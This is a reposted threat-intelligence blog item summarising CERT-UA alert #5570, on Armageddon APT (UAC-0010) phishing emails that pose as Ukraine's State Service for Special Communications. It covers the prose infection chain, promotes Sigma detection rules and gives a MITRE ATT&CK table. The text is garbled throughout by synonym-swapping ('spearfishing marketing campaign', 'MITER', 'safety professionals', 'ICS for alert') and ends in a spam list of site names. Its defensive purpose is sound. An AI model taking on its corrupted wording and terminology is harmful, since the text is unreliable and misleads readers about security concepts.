Armageddon APT Hacker Group aka UAC-0010 spreads phishing emails posing as the State Service for Special Communications of Ukraine

Armageddon APT alias UAC-0010 resurfaces

The Russia-linked Armageddon APT aka gamaredon o UAC-0010 has been launching a collection of cyber assaults in Ukraine because the outbreak of the worldwide cyber warfare. On November 8, 2022, CERT-UA launched the last alert detailing the continuing spearfishing marketing campaign of this Russian-backed cyber-espionage hacker collective, through which adversaries mass-distribute solid emails posing as Ukraine’s State Service for Particular Communications. On this focused adversarial marketing campaign, Armageddon APT hackers exploit the malicious e mail attachment assault vector.

Armageddon APT (UAC-0010) Cyber ​​Assaults: Evaluation of the Newest Phishing Marketing campaign Towards Ukraine

As Russia’s full-scale invasion of Ukrainethe infamous Armageddon APT linked to Russia The group additionally tracked as UAC-0010 or Primitive Bear has been actively exploiting phishing assault vectors and malicious e mail attachments in focused campaigns in opposition to Ukraine. In Might and July 2022, the hacker collective has been massively distributing the GammaLoad.PS1_v2 malwarewhereas in August 2022, the adversaries utilized GammaSteel.PS1 and GammaSteel.NET Malware to unfold the an infection to compromised techniques.

In ongoing adversarial campaigns reported by the CERT-UA#5570 alert, the an infection chain is triggered by phishing emails containing a malicious attachment that, if opened, downloads an HTML file with JavaScript code. The latter creates a RAR file with a shortcut LNK file on the susceptible pc. As soon as opened, the aforementioned LNK file downloads and executes an HTA file which, in flip, executes malicious VBScript code. Consequently, this results in the deployment of quite a few malicious strains on the focused techniques, together with malware samples to steal info.

CERT-UA researchers report that phishing emails are despatched through the @mail.gov.ua service. Moreover, Armageddon APT hackers apply their frequent adversarial patterns to launch cyber assaults utilizing third celebration service or Telegram to determine C2 server IP handle.

Detecting the newest APT Armageddon marketing campaign in opposition to Ukrainian entities

A collection of phishing campaigns by the Russia-linked APT Armageddon, repeatedly focusing on Ukraine since March 2022, characterize a rising risk that requires well timed detection and robust response capabilities by safety professionals. SOC Prime’s Detection-as-Code platform gives a curated set of Sigma guidelines to determine the associated malicious exercise lined within the CERT-UA#5570 alert early within the assault lifecycle. Please observe the hyperlink under to entry the related detection content material labeled “CERT-UA#5570” based mostly on the related cybersecurity alert:

Sigma’s rules for detecting malicious activity of the UAC-0010 group covered in the CERT-UA#5570 alert

To proactively defend in opposition to present and rising Armageddon APT cyberattacks tracked by cyberdefenders since Russia’s full-scale invasion of Ukraine, press the Discover detections and entry the devoted detection stack. All Sigma guidelines are aligned with MITER ATT&CK® and enriched with intensive cyber risk context, together with related CTI hyperlinks, mitigations, executable binaries, and most related metadata. Detection guidelines are full of translations to industry-leading SIEM, EDR, and XDR options.

Explore detections

To simplify the risk looking routine and improve detection engineering capabilities, safety specialists can seek for IOCs related to malicious exercise from the UAC-0010 adversaries lined within the CERT-UA#5570 alert. Simply paste the textual content containing the related IOCs to CTI decoder and get customized IOC queries able to run in a selected atmosphere.

ICS for alert CERT-UA#5570 using Uncoder CTI

Context MITER ATT&CK®

To delve into the context behind the newest cyberattacks by the Russia-linked Armageddon APT group, aka UAC-0010, lined within the CERT-UA#5570 alert, all of Sigma’s devoted guidelines are aligned with MITER ATT&CK® structure addressing the corresponding techniques and methods:

Tactic 

Strategies

sigma rule

protection evasion

Signed binary proxy execution (T1218)

Execution

Command interpreter and scripts (T1059)

command and management

Protocol Tunnel (T1572)

The cost Armageddon APT Hacker Group aka UAC-0010 spreads phishing emails posing as the State Service for Special Communications of Ukraine first appeared in main SOC.

By admin

x
THE FUTURE - BENEFIT NEWS - DANA TECH - RALPH TECH - Tech News - BRING THE TECH - Tech Updates - News Update Viral - THE TRUTH - WORLD TODAY - WORLD UPDATES - NEWS UPDATES - NEWS FLASH - TRUTH NEWS - RANK NEWS - PREMIUM NEWS - FORUM NEWS - PROJECT NEWS - POST NEWS - WORLD NEWS - SPORT NEWS - INDICATOR NEWS - NEWS ROOM - HEADLINE NEWS - NEWS PLAZA